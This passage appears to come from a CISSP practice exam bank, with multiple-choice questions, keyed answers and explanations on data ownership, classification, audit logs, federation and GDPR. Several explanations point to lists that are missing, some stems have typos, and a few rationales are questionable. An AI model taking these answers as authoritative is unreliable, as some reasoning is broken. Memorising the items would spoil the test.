The other options are not as effective as IDaaS in offloading the task of account management from the IT staff, as they do not provide IAM functions. Platform as a Service (PaaS) is a cloud-based service that provides a platform for developing, testing, and deploying applications, but it does not manage the user accounts for the applications. Desktop as a Service (DaaS) is a cloud-based service that provides virtual desktops for users to access applications and data, but it does not manage the user accounts for the virtual desktops. Software as a Service (SaaS) is a cloud-based service that provides software applications for users to use, but it does not manage the user accounts for the software applications.
Which of the following BEST describes the responsibilities of a data owner?
Ensuring quality and validation through periodic audits for ongoing data integrity
Maintaining fundamental data availability, including data storage and archiving
Ensuring accessibility to appropriate users, maintaining appropriate levels of data security
Determining the impact the information has on the mission of the organization
The best description of the responsibilities of a data owner is determining the impact the information has on the mission of the organization. A data owner is a person or entity that has the authority and accountability for the creation, collection, processing, and disposal of a set of data. A data owner is also responsible for defining the purpose, value, and classification of the data, as well as the security requirements and controls for the data. A data owner should be able to determine the impact the information has on the mission of the organization, which means assessing the potential consequences of losing, compromising, or disclosing the data. The impact of the information on the mission of the organization is one of the main criteria for data classification, which helps to establish the appropriate level of protection and handling for the data.
The other options are not the best descriptions of the responsibilities of a data owner, but rather the responsibilities of other roles or functions related to data management. Ensuring quality and validation through periodic audits for ongoing data integrity is a responsibility of a data steward, who is a person or entity that oversees the quality, consistency, and usability of the data. Maintaining fundamental data availability, including data storage and archiving is a responsibility of a data custodian, who is a person or entity that implements and maintains the technical and physical security of the data. Ensuring accessibility to appropriate users, maintaining appropriate levels of data security is a responsibility of a data controller, who is a person or entity that determines the purposes and means of processing the data.
Which one of the following affects the classification of data?
Assigned security label
Multilevel Security (MLS) architecture
Minimum query size
Passage of time
The passage of time is one of the factors that affects the classification of data. Data classification is the process of assigning a level of sensitivity or criticality to data based on its value, impact, and legal requirements. Data classification helps to determine the appropriate security controls and handling procedures for the data. However, data classification is not static, but dynamic, meaning that it can change over time depending on various factors. One of these factors is the passage of time, which can affect the relevance, usefulness, or sensitivity of the data. For example, data that is classified as confidential or secret at one point in time may become obsolete, outdated, or declassified at a later point in time, and thus require a lower level of protection. Conversely, data that is classified as public or unclassified at one point in time may become more valuable, sensitive, or regulated at a later point in time, and thus require a higher level of protection. Therefore, data classification should be reviewed and updated periodically to reflect the changes in the data over time.
The other options are not factors that affect the classification of data, but rather the outcomes or components of data classification. Assigned security label is the result of data classification, which indicates the level of sensitivity or criticality of the data. Multilevel Security (MLS) architecture is a system that supports data classification, which allows different levels of access to data based on the clearance and need-to-know of the users. Minimum query size is a parameter that can be used to enforce data classification, which limits the amount of data that can be retrieved or displayed at a time.
Which of the following is an effective control in preventing electronic cloning of Radio Frequency Identification (RFID) based access cards?
Personal Identity Verification (PIV)
Cardholder Unique Identifier (CHUID) authentication
Physical Access Control System (PACS) repeated attempt detection
Asymmetric Card Authentication Key (CAK) challenge-response
Asymmetric Card Authentication Key (CAK) challenge-response is an effective control in preventing electronic cloning of RFID based access cards. RFID based access cards are contactless cards that use radio frequency identification (RFID) technology to communicate with a reader and grant access to a physical or logical resource. RFID based access cards are vulnerable to electronic cloning, which is the process of copying the data and identity of a legitimate card to a counterfeit card, and using it to impersonate the original cardholder and gain unauthorized access. Asymmetric CAK challenge-response is a cryptographic technique that prevents electronic cloning by using public key cryptography and digital signatures to verify the authenticity and integrity of the card and the reader. Asymmetric CAK challenge-response works as follows:
Asymmetric CAK challenge-response prevents electronic cloning because the private keys of the card and the reader are never transmitted or exposed, and the signatures are unique and non-reusable for each transaction. Therefore, a cloned card cannot produce a valid signature without knowing the private key of the original card, and a rogue reader cannot impersonate a legitimate reader without knowing its private key.
The other options are not as effective as asymmetric CAK challenge-response in preventing electronic cloning of RFID based access cards. Personal Identity Verification (PIV) is a standard for federal employees and contractors to use smart cards for physical and logical access, but it does not specify the cryptographic technique for RFID based access cards. Cardholder Unique Identifier (CHUID) authentication is a technique that uses a unique number and a digital certificate to identify the card and the cardholder, but it does not prevent replay attacks or verify the reader’s identity. Physical Access Control System (PACS) repeated attempt detection is a technique that monitors and alerts on multiple failed or suspicious attempts to access a resource, but it does not prevent the cloning of the card or the impersonation of the reader.
When implementing a data classification program, why is it important to avoid too much granularity?
The process will require too many resources
It will be difficult to apply to both hardware and software
It will be difficult to assign ownership to the data
The process will be perceived as having value
When implementing a data classification program, it is important to avoid too much granularity, because the process will require too many resources. Data classification is the process of assigning a level of sensitivity or criticality to data based on its value, impact, and legal requirements. Data classification helps to determine the appropriate security controls and handling procedures for the data. However, data classification is not a simple or straightforward process, as it involves many factors, such as the nature, context, and scope of the data, the stakeholders, the regulations, and the standards. If the data classification program has too many levels or categories of data, it will increase the complexity, cost, and time of the process, and reduce the efficiency and effectiveness of the data protection. Therefore, data classification should be done with a balance between granularity and simplicity, and follow the principle of proportionality, which means that the level of protection should be proportional to the level of risk.
The other options are not the main reasons to avoid too much granularity in data classification, but rather the potential challenges or benefits of data classification. It will be difficult to apply to both hardware and software is a challenge of data classification, as it requires consistent and compatible methods and tools for labeling and protecting data across different types of media and devices. It will be difficult to assign ownership to the data is a challenge of data classification, as it requires clear and accountable roles and responsibilities for the creation, collection, processing, and disposal of data. The process will be perceived as having value is a benefit of data classification, as it demonstrates the commitment and awareness of the organization to protect its data assets and comply with its obligations.
In a data classification scheme, the data is owned by the
system security managers
business managers
Information Technology (IT) managers
end users
In a data classification scheme, the data is owned by the business managers. Business managers are the persons or entities that have the authority and accountability for the creation, collection, processing, and disposal of a set of data. Business managers are also responsible for defining the purpose, value, and classification of the data, as well as the security requirements and controls for the data. Business managers should be able to determine the impact the information has on the mission of the organization, which means assessing the potential consequences of losing, compromising, or disclosing the data. The impact of the information on the mission of the organization is one of the main criteria for data classification, which helps to establish the appropriate level of protection and handling for the data.
The other options are not the data owners in a data classification scheme, but rather the other roles or functions related to data management. System security managers are the persons or entities that oversee the security of the information systems and networks that store, process, and transmit the data. They are responsible for implementing and maintaining the technical and physical security of the data, as well as monitoring and auditing the security performance and incidents. Information Technology (IT) managers are the persons or entities that manage the IT resources and services that support the business processes and functions that use the data. They are responsible for ensuring the availability, reliability, and scalability of the IT infrastructure and applications, as well as providing technical support and guidance to the users and stakeholders. End users are the persons or entities that access and use the data for their legitimate purposes and needs. They are responsible for complying with the security policies and procedures for the data, as well as reporting any security issues or violations.
Which of the following is MOST important when assigning ownership of an asset to a department?
The department should report to the business owner
Ownership of the asset should be periodically reviewed
Individual accountability should be ensured
All members should be trained on their responsibilities
When assigning ownership of an asset to a department, the most important factor is to ensure individual accountability for the asset. Individual accountability means that each person who has access to or uses the asset is responsible for its protection and proper handling. Individual accountability also implies that each person who causes or contributes to a security breach or incident involving the asset can be identified and held liable. Individual accountability can be achieved by implementing security controls such as authentication, authorization, auditing, and logging.
The other options are not as important as ensuring individual accountability, as they do not directly address the security risks associated with the asset. The department should report to the business owner is a management issue, not a security issue. Ownership of the asset should be periodically reviewed is a good practice, but it does not prevent misuse or abuse of the asset. All members should be trained on their responsibilities is a preventive measure, but it does not guarantee compliance or enforcement of the responsibilities.
In which of the following programs is it MOST important to include the collection of security process data?
Quarterly access reviews
Security continuous monitoring
Business continuity testing
Annual security training
Security continuous monitoring is the program in which it is most important to include the collection of security process data. Security process data is the data that reflects the performance, effectiveness, and compliance of the security processes, such as the security policies, standards, procedures, and guidelines. Security process data can include metrics, indicators, logs, reports, and assessments. Security process data can provide several benefits, such as:
Security continuous monitoring is the program in which it is most important to include the collection of security process data, because it is the program that involves maintaining the ongoing awareness of the security status, events, and activities of the system. Security continuous monitoring can enable the system to detect and respond to any security issues or incidents in a timely and effective manner, and to adjust and improve the security controls and processes accordingly. Security continuous monitoring can also help the system to comply with the security requirements and standards from the internal or external authorities or frameworks.
The other options are not the programs in which it is most important to include the collection of security process data, but rather programs that have other objectives or scopes. Quarterly access reviews are programs that involve reviewing and verifying the user accounts and access rights on a quarterly basis. Quarterly access reviews can ensure that the user accounts and access rights are valid, authorized, and up to date, and that any inactive, expired, or unauthorized accounts or rights are removed or revoked. However, quarterly access reviews are not the programs in which it is most important to include the collection of security process data, because they are not focused on the security status, events, and activities of the system, but rather on the user accounts and access rights. Business continuity testing is a program that involves testing and validating the business continuity plan (BCP) and the disaster recovery plan (DRP) of the system. Business continuity testing can ensure that the system can continue or resume its critical functions and operations in case of a disruption or disaster, and that the system can meet the recovery objectives and requirements. However, business continuity testing is not the program in which it is most important to include the collection of security process data, because it is not focused on the security status, events, and activities of the system, but rather on the continuity and recovery of the system. Annual security training is a program that involves providing and updating the security knowledge and skills of the system users and staff on an annual basis. Annual security training can increase the security awareness and competence of the system users and staff, and reduce the human errors or risks that might compromise the system security. However, annual security training is not the program in which it is most important to include the collection of security process data, because it is not focused on the security status, events, and activities of the system, but rather on the security education and training of the system users and staff.
A Virtual Machine (VM) environment has five guest Operating Systems (OS) and provides strong isolation. What MUST an administrator review to audit a user’s access to data files?
Host VM monitor audit logs
Guest OS access controls
Host VM access controls
Guest OS audit logs
Guest OS audit logs are what an administrator must review to audit a user’s access to data files in a VM environment that has five guest OS and provides strong isolation. A VM environment is a system that allows multiple virtual machines (VMs) to run on a single physical machine, each with its own OS and applications. A VM environment can provide several benefits, such as:
A guest OS is the OS that runs on a VM, which is different from the host OS that runs on the physical machine. A guest OS can have its own security controls and mechanisms, such as access controls, encryption, authentication, and audit logs. Audit logs are records that capture and store the information about the events and activities that occur within a system or a network, such as the access and usage of the data files. Audit logs can provide a reactive and detective layer of security by enabling the monitoring and analysis of the system or network behavior, and facilitating the investigation and response of the incidents.
Guest OS audit logs are what an administrator must review to audit a user’s access to data files in a VM environment that has five guest OS and provides strong isolation, because they can provide the most accurate and relevant information about the user’s actions and interactions with the data files on the VM. Guest OS audit logs can also help the administrator to identify and report any unauthorized or suspicious access or disclosure of the data files, and to recommend or implement any corrective or preventive actions.
The other options are not what an administrator must review to audit a user’s access to data files in a VM environment that has five guest OS and provides strong isolation, but rather what an administrator might review for other purposes or aspects. Host VM monitor audit logs are records that capture and store the information about the events and activities that occur on the host VM monitor, which is the software or hardware component that manages and controls the VMs on the physical machine. Host VM monitor audit logs can provide information about the performance, status, and configuration of the VMs, but they cannot provide information about the user’s access to data files on the VMs. Guest OS access controls are rules and mechanisms that regulate and restrict the access and permissions of the users and processes to the resources and services on the guest OS. Guest OS access controls can provide a proactive and preventive layer of security by enforcing the principles of least privilege, separation of duties, and need to know. However, guest OS access controls are not what an administrator must review to audit a user’s access to data files, but rather what an administrator must configure and implement to protect the data files. Host VM access controls are rules and mechanisms that regulate and restrict the access and permissions of the users and processes to the VMs on the physical machine. Host VM access controls can provide a granular and dynamic layer of security by defining and assigning the roles and permissions according to the organizational structure and policies. However, host VM access controls are not what an administrator must review to audit a user’s access to data files, but rather what an administrator must configure and implement to protect the VMs.
Which of the following is of GREATEST assistance to auditors when reviewing system configurations?
Change management processes
User administration procedures
Operating System (OS) baselines
System backup documentation
Operating System (OS) baselines are of greatest assistance to auditors when reviewing system configurations. OS baselines are standard or reference configurations that define the desired and secure state of an OS, including the settings, parameters, patches, and updates. OS baselines can provide several benefits, such as:
OS baselines are of greatest assistance to auditors when reviewing system configurations, because they can enable the auditors to evaluate and verify the current and actual state of the OS against the desired and secure state of the OS. OS baselines can also help the auditors to identify and report any gaps, issues, or risks in the OS configurations, and to recommend or implement any corrective or preventive actions.
The other options are not of greatest assistance to auditors when reviewing system configurations, but rather of assistance for other purposes or aspects. Change management processes are processes that ensure that any changes to the system configurations are planned, approved, implemented, and documented in a controlled and consistent manner. Change management processes can improve the security and reliability of the system configurations by preventing or reducing the errors, conflicts, or disruptions that might occur due to the changes. However, change management processes are not of greatest assistance to auditors when reviewing system configurations, because they do not define the desired and secure state of the system configurations, but rather the procedures and controls for managing the changes. User administration procedures are procedures that define the roles, responsibilities, and activities for creating, modifying, deleting, and managing the user accounts and access rights. User administration procedures can enhance the security and accountability of the user accounts and access rights by enforcing the principles of least privilege, separation of duties, and need to know. However, user administration procedures are not of greatest assistance to auditors when reviewing system configurations, because they do not define the desired and secure state of the system configurations, but rather the rules and tasks for administering the users. System backup documentation is documentation that records the information and details about the system backup processes, such as the backup frequency, type, location, retention, and recovery. System backup documentation can increase the availability and resilience of the system by ensuring that the system data and configurations can be restored in case of a loss or damage. However, system backup documentation is not of greatest assistance to auditors when reviewing system configurations, because it does not define the desired and secure state of the system configurations, but rather the backup and recovery of the system configurations.
Which of the following is a PRIMARY benefit of using a formalized security testing report format and structure?
Executive audiences will understand the outcomes of testing and most appropriate next steps for corrective actions to be taken
Technical teams will understand the testing objectives, testing strategies applied, and business risk associated with each vulnerability
Management teams will understand the testing objectives and reputational risk to the organization
Technical and management teams will better understand the testing objectives, results of each test phase, and potential impact levels
Technical and management teams will better understand the testing objectives, results of each test phase, and potential impact levels is the primary benefit of using a formalized security testing report format and structure. Security testing is a process that involves evaluating and verifying the security posture, vulnerabilities, and threats of a system or a network, using various methods and techniques, such as vulnerability assessment, penetration testing, code review, and compliance checks. Security testing can provide several benefits, such as:
A security testing report is a document that summarizes and communicates the findings and recommendations of the security testing process to the relevant stakeholders, such as the technical and management teams. A security testing report can have various formats and structures, depending on the scope, purpose, and audience of the report. However, a formalized security testing report format and structure is one that follows a standard and consistent template, such as the one proposed by the National Institute of Standards and Technology (NIST) in the Special Publication 800-115, Technical Guide to Information Security Testing and Assessment. A formalized security testing report format and structure can have several components, such as:
Technical and management teams will better understand the testing objectives, results of each test phase, and potential impact levels is the primary benefit of using a formalized security testing report format and structure, because it can ensure that the security testing report is clear, comprehensive, and consistent, and that it provides the relevant and useful information for the technical and management teams to make informed and effective decisions and actions regarding the system or network security.
The other options are not the primary benefits of using a formalized security testing report format and structure, but rather secondary or specific benefits for different audiences or purposes. Executive audiences will understand the outcomes of testing and most appropriate next steps for corrective actions to be taken is a benefit of using a formalized security testing report format and structure, but it is not the primary benefit, because it is more relevant for the executive summary component of the report, which is a brief and high-level overview of the report, rather than the entire report. Technical teams will understand the testing objectives, testing strategies applied, and business risk associated with each vulnerability is a benefit of using a formalized security testing report format and structure, but it is not the primary benefit, because it is more relevant for the methodology and results components of the report, which are more technical and detailed parts of the report, rather than the entire report. Management teams will understand the testing objectives and reputational risk to the organization is a benefit of using a formalized security testing report format and structure, but it is not the primary benefit, because it is more relevant for the introduction and conclusion components of the report, which are more contextual and strategic parts of the report, rather than the entire report.
Which of the following could cause a Denial of Service (DoS) against an authentication system?
Encryption of audit logs
No archiving of audit logs
Hashing of audit logs
Remote access audit logs
Remote access audit logs could cause a Denial of Service (DoS) against an authentication system. A DoS attack is a type of attack that aims to disrupt or degrade the availability or performance of a system or a network by overwhelming it with excessive or malicious traffic or requests. An authentication system is a system that verifies the identity and credentials of the users or entities that want to access the system or network resources or services. An authentication system can use various methods or factors to authenticate the users or entities, such as passwords, tokens, certificates, biometrics, or behavioral patterns.
Remote access audit logs are records that capture and store the information about the events and activities that occur when the users or entities access the system or network remotely, such as via the internet, VPN, or dial-up. Remote access audit logs can provide a reactive and detective layer of security by enabling the monitoring and analysis of the remote access behavior, and facilitating the investigation and response of the incidents.
Remote access audit logs could cause a DoS against an authentication system, because they could consume a large amount of disk space, memory, or bandwidth on the authentication system, especially if the remote access is frequent, intensive, or malicious. This could affect the performance or functionality of the authentication system, and prevent or delay the legitimate users or entities from accessing the system or network resources or services. For example, an attacker could launch a DoS attack against an authentication system by sending a large number of fake or invalid remote access requests, and generating a large amount of remote access audit logs that fill up the disk space or memory of the authentication system, and cause it to crash or slow down.
The other options are not the factors that could cause a DoS against an authentication system, but rather the factors that could improve or protect the authentication system. Encryption of audit logs is a technique that involves using a cryptographic algorithm and a key to transform the audit logs into an unreadable or unintelligible format, that can only be reversed or decrypted by authorized parties. Encryption of audit logs can enhance the security and confidentiality of the audit logs by preventing unauthorized access or disclosure of the sensitive information in the audit logs. However, encryption of audit logs could not cause a DoS against an authentication system, because it does not affect the availability or performance of the authentication system, but rather the integrity or privacy of the audit logs. No archiving of audit logs is a practice that involves not storing or transferring the audit logs to a separate or external storage device or location, such as a tape, disk, or cloud. No archiving of audit logs can reduce the security and availability of the audit logs by increasing the risk of loss or damage of the audit logs, and limiting the access or retrieval of the audit logs. However, no archiving of audit logs could not cause a DoS against an authentication system, because it does not affect the availability or performance of the authentication system, but rather the availability or preservation of the audit logs. Hashing of audit logs is a technique that involves using a hash function, such as MD5 or SHA, to generate a fixed-length and unique value, called a hash or a digest, that represents the audit logs. Hashing of audit logs can improve the security and integrity of the audit logs by verifying the authenticity or consistency of the audit logs, and detecting any modification or tampering of the audit logs. However, hashing of audit logs could not cause a DoS against an authentication system, because it does not affect the availability or performance of the authentication system, but rather the integrity or verification of the audit logs.
Why should Open Web Application Security Project (OWASP) Application Security Verification standards (ASVS) Level 1 be considered a MINIMUM level of protection for any web application?
ASVS Level 1 ensures that applications are invulnerable to OWASP top 10 threats.
Opportunistic attackers will look for any easily exploitable vulnerable applications.
Most regulatory bodies consider ASVS Level 1 as a baseline set of controls for applications.
Securing applications at ASVS Level 1 provides adequate protection for sensitive data.
OWASP Application Security Verification Standards (ASVS) Level 1 is the lowest level of protection for any web application, as it only requires automated verification of the security controls. ASVS Level 1 should be considered a minimum level of protection, because opportunistic attackers will look for any easily exploitable vulnerable applications, and automated verification may not detect all the possible flaws or weaknesses. Option A, ASVS Level 1 ensures that applications are invulnerable to OWASP top 10 threats, is incorrect, as ASVS Level 1 does not guarantee that the applications are immune to the most common web application security risks. Option C, most regulatory bodies consider ASVS Level 1 as a baseline set of controls for applications, is incorrect, as most regulatory bodies require higher levels of verification and assurance for applications that handle sensitive or regulated data. Option D, securing applications at ASVS Level 1 provides adequate protection for sensitive data, is incorrect, as ASVS Level 1 is not sufficient for protecting sensitive data, and higher levels of verification and encryption are needed. References: CISSP practice exam questions and answers | TechTarget, CISSP All-in-One Exam Guide, Eighth Edition
Which of the following should exist in order to perform a security audit?
Industry framework to audit against
External (third-party) auditor
Internal certified auditor
Neutrality of the auditor
The thing that should exist in order to perform a security audit is an industry framework to audit against. A security audit is a systematic and independent examination of the security policies, procedures, controls, and practices of an organization, system, or network, to verify their compliance, effectiveness, and efficiency. A security audit requires an industry framework to audit against, which is a set of standards, guidelines, or best practices that define the security requirements, objectives, and criteria for the audit. An industry framework to audit against can help to establish the scope, methodology, and expectations of the security audit, as well as to measure and report the performance, gaps, and recommendations of the security audit. An industry framework to audit against can also help to ensure the consistency, reliability, and validity of the security audit, as well as to facilitate the comparison, benchmarking, and improvement of the security audit. Some examples of industry frameworks to audit against are ISO/IEC 27001, NIST SP 800-53, COBIT, or CIS Controls. An external (third-party) auditor, an internal certified auditor, and the neutrality of the auditor are not things that should exist in order to perform a security audit. These are some of the factors or attributes that may affect the quality, credibility, and independence of the security audit, but they are not prerequisites or conditions for the security audit. A security audit can be performed by an external or internal auditor, depending on the purpose, scope, and resources of the audit. A security audit can be performed by a certified or non-certified auditor, depending on the qualifications, skills, and experience of the auditor. A security audit should be performed by a neutral or unbiased auditor, to avoid any conflict of interest, influence, or pressure from the auditee or other parties. References: Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 1, Security and Risk Management, page 28. CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1, Security Governance Through Principles and Policies, page 29.
Which layer of the Open systems Interconnection (OSI) model is being targeted in the event of a Synchronization (SYN) flood attack?
Session
Transport
Network
Presentation
A Synchronization (SYN) flood attack is a type of denial-of-service (DoS) attack that exploits the three-way handshake mechanism of the Transmission Control Protocol (TCP), which operates at the transport layer of the Open Systems Interconnection (OSI) model. In a SYN flood attack, the attacker sends a large number of SYN packets to the target server, but does not respond to the SYN-ACK packets sent by the server. This causes the server to exhaust its resources and become unable to accept legitimate requests. The session, network, and presentation layers of the OSI model are not directly involved in this attack. References:
CISSP Official (ISC)2 Practice Tests, 3rd Edition, Domain 4: Communication and Network Security, Question 4.2.1
CISSP CBK, 5th Edition, Chapter 4: Communication and Network Security, Section: Secure Network Architecture and Design
In Federated Identity Management (FIM), which of the following represents the concept of federation?
Collection of information logically grouped into a single entity
Collection, maintenance, and deactivation of user objects and attributes in one or more systems, directories or applications
Collection of information for common identities in a system
Collection of domains that have established trust among themselves
The concept of federation in Federated Identity Management (FIM) is the collection of domains that have established trust among themselves. A domain is a logical or administrative boundary that defines the scope and authority of an identity provider (IdP) or a service provider (SP). An IdP is an entity that creates, maintains, and verifies the identities and attributes of the users. An SP is an entity that provides services or resources to the users, and relies on the IdP for the authentication and authorization of the users. A federation is a group of domains that have agreed to share and accept the identities and attributes of the users across the domains, based on a common set of policies, standards, and protocols. A federation enables the users to access multiple services or resources from different domains, using a single or federated identity, without having to create or manage multiple accounts or credentials. A federation also enhances the security, privacy, and convenience of the users and the domains, by reducing the identity management overhead and complexity, and by enabling the users to control the disclosure and use of their identity information . References: [CISSP CBK, Fifth Edition, Chapter 5, page 449]; [CISSP Practice Exam – FREE 20 Questions and Answers, Question 18].
Organization A is adding a large collection of confidential data records that it received when it acquired Organization B to its data store. Many of the users and staff from Organization B are no longer available. Which of the following MUST Organization A 0do to property classify and secure the acquired data?
Assign data owners from Organization A to the acquired data.
Create placeholder accounts that represent former users from Organization B.
Archive audit records that refer to users from Organization A.
Change the data classification for data acquired from Organization B.
Data ownership is a key concept in data security and classification. Data owners are responsible for defining the value, sensitivity, and classification of the data, as well as the access rights and controls for the data. When Organization A acquires data from Organization B, it should assign data owners from its own organization to the acquired data, so that they can properly classify and secure the data according to Organization A’s policies and standards. Creating placeholder accounts, archiving audit records, or changing the data classification are not sufficient or necessary steps to ensure the security of the acquired data. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 2: Asset Security, page 67; CISSP Official (ISC)2 Practice Tests, Third Edition, Domain 2: Asset Security, Question 2.4, page 76.
Which of the following is the MOST common cause of system or security failures?
Lack of system documentation
Lack of physical security controls
Lack of change control
Lack of logging and monitoring
The most common cause of system or security failures is lack of change control. Change control is a process that ensures that any changes to the system or the environment are authorized, documented, tested, and approved before implementation. Change control helps to prevent errors, conflicts, inconsistencies, and vulnerabilities that may arise from unauthorized or uncontrolled changes. Lack of change control can result in system instability, performance degradation, functionality loss, security breaches, or compliance violations. Lack of system documentation, lack of physical security controls, and lack of logging and monitoring are also potential causes of system or security failures, but they are not as common or as critical as lack of change control. References: CISSP CBK Reference, 5th Edition, Chapter 3, page 145; CISSP All-in-One Exam Guide, 8th Edition, Chapter 3, page 113
Which of the following is the FIRST requirement a data owner should consider before implementing a data retention policy?
Training
Legal
Business
Storage
The first requirement a data owner should consider before implementing a data retention policy is the legal requirement. A data retention policy is a document that defines the rules and procedures for retaining, storing, and disposing of data, based on its type, value, and purpose. A data owner is a person or an entity that has the authority and responsibility for the creation, classification, and management of data. A data owner should consider the legal requirement before implementing a data retention policy, as there may be laws, regulations, or contracts that mandate the minimum or maximum retention periods for certain types of data, as well as the methods and standards for data preservation and destruction. A data owner should also consider the business, storage, and training requirements for implementing a data retention policy, but these are not the first or the most important factors to consider.
What is the correct order of execution for security architecture?
Governance, strategy and program management, project delivery, operations
Strategy and program management, governance, project delivery, operations
Governance, strategy and program management, operations, project delivery
Strategy and program management, project delivery, governance, operations
Security architecture is the design and implementation of the security controls, mechanisms, and processes that protect the confidentiality, integrity, and availability of the information and systems of an organization. Security architecture is aligned with the business goals, objectives, and requirements of the organization, and supports the security policies, standards, and guidelines of the organization. Security architecture follows a systematic and structured approach, which consists of the following phases or steps:
In fault-tolerant systems, what do rollback capabilities permit?
Restoring the system to a previous functional state
Identifying the error that caused the problem
Allowing the system to an in a reduced manner
Isolating the error that caused the problem
Fault-tolerant systems are systems that can continue to operate despite the occurrence of faults, errors, or failures in some of their components. Fault-tolerant systems use redundancy, diversity, and error detection and correction mechanisms to achieve high availability, reliability, and resilience. Rollback capabilities are one of the mechanisms that enable fault tolerance, which allow the system to restore itself to a previous functional state before the fault occurred. Rollback capabilities can be implemented using checkpoints, snapshots, backups, or logs that record the state of the system at regular intervals or before critical operations. If a fault is detected, the system can revert to the most recent or closest checkpoint, snapshot, backup, or log that represents a valid and consistent state of the system, and resume its normal operation from there. References: What Is Fault Tolerance? | Creating a Fault-tolerant System, What is Fault Tolerance? | Creating a Fault Tolerant System, Fault Tolerance, RAID - System Resilience and Fault Tolerance, System Resilience, High Availability, QoS, and Fault Tolerance
A hospital enforces the Code of Fair Information Practices. What practice applies to a patient requesting their medical records from a web portal?
Use limitation
Individual participation
Purpose specification
Collection limitation
Individual participation is the practice that applies to a patient requesting their medical records from a web portal, according to the Code of Fair Information Practices. The Code of Fair Information Practices is a set of principles that govern the collection, use, and protection of personal information, and that aim to ensure the privacy and security of individuals. The Code of Fair Information Practices consists of five principles: collection limitation, data quality, purpose specification, use limitation, and individual participation. Individual participation is the principle that states that individuals should have the right to access, review, correct, or delete their personal information, and to consent or object to the collection, use, or disclosure of their personal information. In the context of a hospital, individual participation means that a patient should be able to request their medical records from a web portal, and to control how their medical records are used or shared by the hospital. The other options are not the practice that applies to a patient requesting their medical records from a web portal, as they either do not involve individual participation, or do not relate to the Code of Fair Information Practices. References: CISSP - Certified Information Systems Security Professional, Domain 1. Security and Risk Management, 1.6 Understand legal and regulatory issues that pertain to information security in a global context, 1.6.3 Understand, adhere to, and promote professional ethics, 1.6.3.1 Code of Fair Information Practices; CISSP Exam Outline, Domain 1. Security and Risk Management, 1.6 Understand legal and regulatory issues that pertain to information security in a global context, 1.6.3 Understand, adhere to, and promote professional ethics, 1.6.3.1 Code of Fair Information Practices
A client has reviewed a vulnerability assessment report and has stated it is inaccurate. The client states that the vulnerabilities listed are not valid because the host’s Operating system (OS) was not properly detected.
Where in the vulnerability assessment process did the error MOST likely occur?
Enumeration
Detection
Reporting
Discovery
The error most likely occurred in the discovery phase of the vulnerability assessment process. Discovery is the phase where the assessor identifies the hosts, services, and applications that are present on the target network or system. Discovery can be done using active or passive methods, such as scanning, sniffing, or querying. If the discovery phase is not performed correctly, the assessor may miss some hosts or misidentify their operating systems, which can lead to inaccurate or incomplete results in the subsequent phases of the vulnerability assessment process. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 7: Security Operations, page 377. CISSP Practice Exam – FREE 20 Questions and Answers, Question 14.
The European Union (EU) General Data Protection Regulation (GDPR) requires organizations to implement appropriate technical and organizational measures to ensure a
level of security appropriate to the risk. The Data Owner should therefore consider which of the following requirements?
Data masking and encryption of personal data
Only to use encryption protocols approved by EU
Anonymization of personal data when transmitted to sources outside the EU
Never to store personal data of EU citizens outside the EU
The GDPR is a regulation that aims to protect the privacy and security of the personal data of individuals in the EU. The GDPR requires organizations to implement appropriate technical and organizational measures to ensure a level of security appropriate to the risk. The data owner, who is the person or entity that has the authority and responsibility for the personal data, should therefore consider data masking and encryption of personal data as possible technical measures. Data masking is a technique that replaces or obscures sensitive or identifying information in the personal data with fictitious or random data, such as replacing names with pseudonyms or masking credit card numbers with asterisks. Data encryption is a technique that transforms the personal data into an unreadable or unintelligible form using a secret key, such that only authorized parties with the correct key can access or decrypt the personal data. Data masking and encryption can protect the personal data from unauthorized access, disclosure, or modification, and reduce the impact of data breaches or leaks. References: Official (ISC)2 CISSP CBK Reference, Fifth Edition, Domain 2: Asset Security, pp. 323-324; CISSP All-in-One Exam Guide, Eighth Edition, Chapter 3: Asset Security, pp. 269-270.
Asymmetric algorithms are used for which of the following when using Secure Sockets Layer/Transport Layer Security (SSL/TLS) for implementing network security?
Peer authentication
Payload data encryption
Session encryption
Hashing digest
Asymmetric algorithms are used for peer authentication when using Secure Sockets Layer/Transport Layer Security (SSL/TLS) for implementing network security. SSL/TLS is a protocol that provides secure communication over the internet by encrypting and authenticating the data and the parties involved. Asymmetric algorithms are cryptographic algorithms that use two different keys, a public key and a private key, for encryption and decryption. Asymmetric algorithms are used for peer authentication in SSL/TLS, which is the process of verifying the identity and trustworthiness of the client and the server. Peer authentication is done by exchanging digital certificates, which are electronic documents that contain the public key and other information of the owner, and are signed by a trusted third party, such as a certificate authority. The client and the server validate each other’s certificates using asymmetric algorithms, and establish a secure connection if the certificates are valid. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 4: Communication and Network Security, page 172. CISSP Practice Exam – FREE 20 Questions and Answers, Question 16.
A criminal organization is planning an attack on a government network. Which of the following scenarios presents the HIGHEST risk to the organization?
Network is flooded with communication traffic by the attacker.
Organization loses control of their network devices.
Network management communications is disrupted.
Attacker accesses sensitive information regarding the network topology.
The scenario that presents the highest risk to the organization is the one where the organization loses control of their network devices. Network devices are the hardware components that enable the communication and connectivity between the systems and networks, such as the switches, routers, firewalls, or servers. Losing control of the network devices means that the organization cannot manage, configure, or monitor the network devices, and that the network devices are compromised, manipulated, or controlled by the attacker. Losing control of the network devices can have severe consequences for the organization, such as:
As a security manger which of the following is the MOST effective practice for providing value to an organization?
Assess business risk and apply security resources accordingly
Coordinate security implementations with internal audit
Achieve compliance regardless of related technical issues
Identify confidential information and protect it
Assessing business risk and applying security resources accordingly is the most effective practice for providing value to an organization as a security manager. Business risk is the potential for loss or harm to the organization’s assets, reputation, or objectives due to internal or external threats. Security resources are the people, processes, and technologies that are used to protect the organization’s information and systems. By assessing the business risk, the security manager can identify and prioritize the most critical and likely threats and vulnerabilities, and align the security resources with the organization’s goals and needs. This way, the security manager can provide value by optimizing the security performance, reducing the security costs, and enhancing the business outcomes. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 5. CISSP Practice Exam – FREE 20 Questions and Answers, Question 13.
What should be used immediately after a Business Continuity Plan (BCP) has been invoked?
Resumption procedures describing the actions to be taken to return to normal business operations
Emergency procedures describing the necessary actions to be taken following an incident jeopardizes business operations
Fallback procedures describing what action are to be taken to more essential business activities to alternative temporary locations
Maintain schedule how and the plan will be tested and the process for maintaining the plan
